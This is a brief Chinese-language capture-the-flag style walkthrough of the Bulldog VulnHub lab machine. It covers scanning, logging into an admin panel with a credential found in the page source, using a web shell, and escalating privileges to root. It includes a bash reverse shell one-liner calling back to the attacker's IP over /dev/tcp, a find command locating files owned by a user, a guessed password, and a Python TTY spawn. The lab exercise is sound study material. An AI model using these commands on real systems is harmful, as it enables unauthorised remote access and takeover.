前言
一个很老的靶机,Bulldog-vlunhub
攻击机IP
:192.168.1.124
靶机IP
:192.168.1.158
渗透过程
扫描端口
访问80端口,扫描目录
在访问admin
发现这是个后台,可以登录的,但是现在缺的是账号密码
然后访问/dev/
,
这里有一个webshell
的链接
返回这么个东西,我们得与服务器完成认证后才能使用shell
所以得获得一个能登录后台的账号密码
查看源码:
然后可以获得一个可以登录的账号,密码(md5
解密一下)
nick : bulldog
登录后,在访问webshell
的链接
反弹shell,同时监听攻击机6666端口。
1 | echo "bash -i >& /dev/tcp/192.168.1.124/6666 0>&1" | bash |
然后查看/etc/passwd
获得一个root用户:bulldogadmin
划重点———————————
查看bulldogadmin
的相关文件
1 | find / -user bulldogadmin 2>/dev/null |
查看这两个文件
猜测密码为:SUPERultimatePASSWORDyouCANTget
然后提权
提权前第一件事儿就是获得tty
1 | python -c 'import pty; pty.spawn("/bin/bash")' |
提权成功
总结
像极了CTF,有点脑洞,然后学习了查看root用户文件